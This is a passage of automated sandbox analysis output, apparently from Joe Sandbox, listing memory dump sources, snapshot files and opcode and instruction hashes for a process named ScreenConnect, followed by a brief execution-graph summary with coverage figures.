                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53018172909391CFC7529B74AC890C8BFB0EE6631170645EFD8C4CB512F6345A97CBA2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: fa6176d1a6f07883688148d66a6109490b8cd114f23375db936e8ccb3398801d
                                                                                                                                                                                                                                                  • Instruction ID: c7904fbd2a3a6f789f2a3e567fe13ae57994b9c762b52efc901129645557bfb6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa6176d1a6f07883688148d66a6109490b8cd114f23375db936e8ccb3398801d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ACF0C2323052456FDF069FA8A8009EF3FB6EB89270B05406AF509D7262CA35885683A1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 4c5087174dcae72e47df7c1ca52a6e2bfbe61c79d74626c249b24c92375f2c29
                                                                                                                                                                                                                                                  • Instruction ID: b14e36b3d47b0a57ca272131a051ee8ffbee5da6180a324ec886a36365b2756a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c5087174dcae72e47df7c1ca52a6e2bfbe61c79d74626c249b24c92375f2c29
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EF0247294E7800FC3135FA59C548467F70EA5321030A41EBE44ACF2E3DA25AC0AC3BA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: d7cacfa67187e13a27671fc2e2f7bf22517f08d017e7d826b0af1c599fdc00f0
                                                                                                                                                                                                                                                  • Instruction ID: abf8f4b905fb437bc263fa00f99c00647e1411b60111374cff24fd2fe543dd17
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7cacfa67187e13a27671fc2e2f7bf22517f08d017e7d826b0af1c599fdc00f0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52F0F6225093800FD717D768F85169A7FE1EEC321074A0ADED081CB266D654E909D355
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3dc38df4a398fa3c6e9e0d054d7371f0bc56bd32e2ac7ed1382021c6cc11fb5e
                                                                                                                                                                                                                                                  • Instruction ID: d6ed785f2023f1f2be8d16246cb46eac0b8a9ec73d6c1197353fe37a6a625554
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3dc38df4a398fa3c6e9e0d054d7371f0bc56bd32e2ac7ed1382021c6cc11fb5e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1F0A076A0D3442FD3168BBA990159B7FEDCFC611070980AFD54CC3242E821950287A8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: f1a2c2ce84b32cb427e7ab337a444263a2e4c62ce825476cbee8a02b56caeecb
                                                                                                                                                                                                                                                  • Instruction ID: 94187194a6b81d6a4cee964c0d276620f261dbab2ef673544c933fb570847000
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1a2c2ce84b32cb427e7ab337a444263a2e4c62ce825476cbee8a02b56caeecb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF0E5223153805BD7195ABE689C42A7FEAEBCE56571840BEE50AC7346CD299C058374
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 14d3c18890525d0d6201f7e151628ad81cf0c846d79768b0c386f2b497c82d38
                                                                                                                                                                                                                                                  • Instruction ID: 41dd05b1efdee7703ee20d449257642ccede2b7a965de518d102ded3e1bf8e7e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 14d3c18890525d0d6201f7e151628ad81cf0c846d79768b0c386f2b497c82d38
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EBF0A930A05248EFDB49EFA8D8452ACBBF0FB01210F5104EAC001A7264EB306B80CB81
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 8221086cc99b69803c57004e8a2f7b9840de8d411f33bf13d7849cc09e09e13c
                                                                                                                                                                                                                                                  • Instruction ID: c8a9e3f920c6aa9934962ebbcd56364f84ad6c02743fc7fa0eb462bbe47708d1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8221086cc99b69803c57004e8a2f7b9840de8d411f33bf13d7849cc09e09e13c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12F03730A01208EFDB48EBA8D5486ACBBF1FB44254F5041A9C505A7268EB306F94CB90
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0f2b1c1a21b13e46922adb28f98f75382dca32a0ab198bad38cfdab73a763aca
                                                                                                                                                                                                                                                  • Instruction ID: 6e8914683695127cca5f391efa06276e88e64b60c549067d87fa216a2da8056a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f2b1c1a21b13e46922adb28f98f75382dca32a0ab198bad38cfdab73a763aca
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41F05E30B001148FD719DF6DD958AAEBBE1EF8835070580A9EC05CB368DB34DD11CB80
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 62c1c24bc2abd1dd05c311b69b771a41c2ad58145ec2446d6d5a69f81c140a46
                                                                                                                                                                                                                                                  • Instruction ID: 19a2451828b789ec4b398138a7f72691144614939451d2134da297d6577dbc4e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 62c1c24bc2abd1dd05c311b69b771a41c2ad58145ec2446d6d5a69f81c140a46
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84E065367041096F4B09DB4ED440D5BBBEAEFD8360715C06AFC09C7355DA35DD118BA4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 3cae1918188de4958d0da184598b3cada8768675cd40e42a9104640e6248b6ae
                                                                                                                                                                                                                                                  • Instruction ID: 62bdf3e6517b48248f193ce7cb745c183cc058bee52dd7898bc66c5372a8b777
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3cae1918188de4958d0da184598b3cada8768675cd40e42a9104640e6248b6ae
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83F0A7326552404FC316A778AC1549F7BB2EBC121170889BFE506CB349DF628C4687E4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
Memory Dump Source
• Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c24799058562ec0aff1b99d2c0c3d61739e9f636542a0203337df1ad592b66a7
                                                                                                                                                                                                                                                  • Instruction ID: 70c91a3c371091a11b68c78d10df922562346bd22385a0f3985eb35cb0a4f8de
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c24799058562ec0aff1b99d2c0c3d61739e9f636542a0203337df1ad592b66a7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39E086393011105B8304677DF40C45E7B9BEBD95613104525E92BC7380CF749C02C7A4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0fefc25f35a03c89cce5e73ccd33b2816869d648bb923edf7efff5da3424d6bf
                                                                                                                                                                                                                                                  • Instruction ID: 205309118936fc331f232834ba416d39f42ac0b5138f470bf5abfc7320786bfc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fefc25f35a03c89cce5e73ccd33b2816869d648bb923edf7efff5da3424d6bf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98E0C2333901209FD7155B68E854B967FA5DF9A120B0540EAE544CF322DA32DC4183DA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: c4d9c0be570b29bcbffe27cfdec5134bef768ab5370d1f9cf66b02df491bfce8
                                                                                                                                                                                                                                                  • Instruction ID: f0f98a09e976709c8fe3f4a8decd380ccfb4bcc0fdf2785219d05c60edc2d746
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c4d9c0be570b29bcbffe27cfdec5134bef768ab5370d1f9cf66b02df491bfce8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEE04F7150D3809FC3419F38AD145497FF0AE06200B4A44AAD8C9C7655E231AC45C762
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: db9249e110bb76ac3034ee9e435dc3446658c0d11260b1831bad6eae02ca8f27
                                                                                                                                                                                                                                                  • Instruction ID: ced08e1743c96909914d7169c158b27bcb96db36828136221b8d67f5829f2145
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db9249e110bb76ac3034ee9e435dc3446658c0d11260b1831bad6eae02ca8f27
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3E0DF75E15288DFC755DFB8EA4165DBBB0EF8A201B114DEEC80CD7222EA30AE04DB00
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 30434db39a9e5c5a07737fadeee8680f08d3911aa0cb3c9d7700d051868f9fbc
                                                                                                                                                                                                                                                  • Instruction ID: 1cbe765623e6f924d609ca431b6ab9a1b2c3d5f1f5beac6d8d1f560402c7eec7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30434db39a9e5c5a07737fadeee8680f08d3911aa0cb3c9d7700d051868f9fbc
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09D05E3A3005149F83049B4EE408C4AFFEAEFC9721305806AF609C7320CA71EC01CB94
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 785efd9fc32f958b373a5b21e19b5b9c3ef7096e647c9618fb6ee7e1940ccdfa
                                                                                                                                                                                                                                                  • Instruction ID: cff679f953b4a5e677e972224f926a260fc2d9a742fe16a167a2c683e999795d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 785efd9fc32f958b373a5b21e19b5b9c3ef7096e647c9618fb6ee7e1940ccdfa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47E086314047498FC701AF74D4990A8BB70EE95304B15868BD8495B113FB7095A5D782
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: b5d608ab8f56d0c101b7007425b922bb7649c59669400c23c508028d926e193b
                                                                                                                                                                                                                                                  • Instruction ID: 4937e02be3893b1ea77286f1e8ea47dd8b481fbb5fecd728f040ae6bd79a7104
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5d608ab8f56d0c101b7007425b922bb7649c59669400c23c508028d926e193b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAD01274A11188EF8B44EFA8E90055DB7B5EB45204B1085A9D909D3300EA31AF04DB54
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 72e707b728c7e3e2f7ae5ee1ee3347b86f98b72c96f3afa1f4e2d1db9c1932a3
                                                                                                                                                                                                                                                  • Instruction ID: a928dde544c61969eab458c646488e8da650dc8d95199800b4d8c2184640b068
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72e707b728c7e3e2f7ae5ee1ee3347b86f98b72c96f3afa1f4e2d1db9c1932a3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59D013323501149F97089B5DD414C577BDDDF9D56031140A5F505C7331DA71DC5097D5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 54e68ddb6de1efc41a998c19a7c0bbfbd5553b6d5cae5361f2430b2145304a6d
                                                                                                                                                                                                                                                  • Instruction ID: 59d8df2cbcae213e8008c5a3a6a7fd41df4c0df9cc5ef07712ddc0828cb305b7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 54e68ddb6de1efc41a998c19a7c0bbfbd5553b6d5cae5361f2430b2145304a6d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30D012353105285F8744AA5DD404C9977DEDF5E6703504066FA05CB330DEB1EC10A7D5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0ece720421720f45b5e4f261400ee7e7ca3ca5901c59e0bb4b5d9a36c0f7e9bf
                                                                                                                                                                                                                                                  • Instruction ID: 72f6fe8967bbe0c2e9bea8ff97a8675803705466776407ae85ec43374d6ceab3
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ece720421720f45b5e4f261400ee7e7ca3ca5901c59e0bb4b5d9a36c0f7e9bf
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53D0C73141470D89C700BB78D854469B7B8EED5240F04D65BE44957111FF70E5D0D681
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2951749324.0000000005FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FE0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_5fe0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: bfcb232092e6f081bff8b2b4e5b617392b308f754c4fb1393985d07279a91b93
                                                                                                                                                                                                                                                  • Instruction ID: 5e6a49debcea1dbfef3c1d329c54e465239abf12a80de42feaf6a22dcf3e5de0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfcb232092e6f081bff8b2b4e5b617392b308f754c4fb1393985d07279a91b93
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 30A0028AA8020402A5687E354DC516B231FB7D41147CC8498011244158EE2DD0069410
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2940549957.0000000001B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B10000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1b10000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 0eb6ae77add54e10c84beb22618b2a9ff6cd188fe5f0027025dd1c66d7a8f010
                                                                                                                                                                                                                                                  • Instruction ID: 8ecd76cd7f1403fdd00de3eec8c4ceab7a6ba169a6f326fa5a18981b47b18b1a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0eb6ae77add54e10c84beb22618b2a9ff6cd188fe5f0027025dd1c66d7a8f010
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1A002752010009BC244DB54C995C15F765EFE5319728C4AEA9198B256CF33ED13DA54

                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                  Execution Coverage:13.7%
                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                  Total number of Nodes:5
                                                                                                                                                                                                                                                  Total number of Limit Nodes:1
                                                                                                                                                                                                                                                  execution_graph 12589 7ffd9b888014 12591 7ffd9b88801d 12589->12591 12590 7ffd9b888082 12591->12590 12592 7ffd9b8880f6 SetProcessMitigationPolicy 12591->12592 12593 7ffd9b888152 12592->12593

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                                  • API String ID: 0-2852464175
                                                                                                                                                                                                                                                  • Opcode ID: 0e6dce4f30cb9713de294d7694695ccc56d622bf17556a5a42fcb98e0ce20532
                                                                                                                                                                                                                                                  • Instruction ID: f4f1f42350c7b571dff961f3227fd884ee7dcc2b2a5359938c654b4992fd15f5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e6dce4f30cb9713de294d7694695ccc56d622bf17556a5a42fcb98e0ce20532
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED321831B0EE4E0FE7A597A8C4746B967D1FF94388F56007AD05EC72F6DE28AA058341
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2953832341.00007FFD9BB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB90000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_7ffd9bb90000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 9220031fd2e207281f5781b147306940435d33a150b88cefb5942cefdc9bd6e4
                                                                                                                                                                                                                                                  • Instruction ID: 9e69d34f10bc7211aa0b726d4d2ce424e75adade3cd3f51a6094fada510c46d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9220031fd2e207281f5781b147306940435d33a150b88cefb5942cefdc9bd6e4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86122631B1EA4E4BEBB99AA8D4B06B43391FF5438CF160179D45EC71E7ED28A9468340

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.2949550658.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
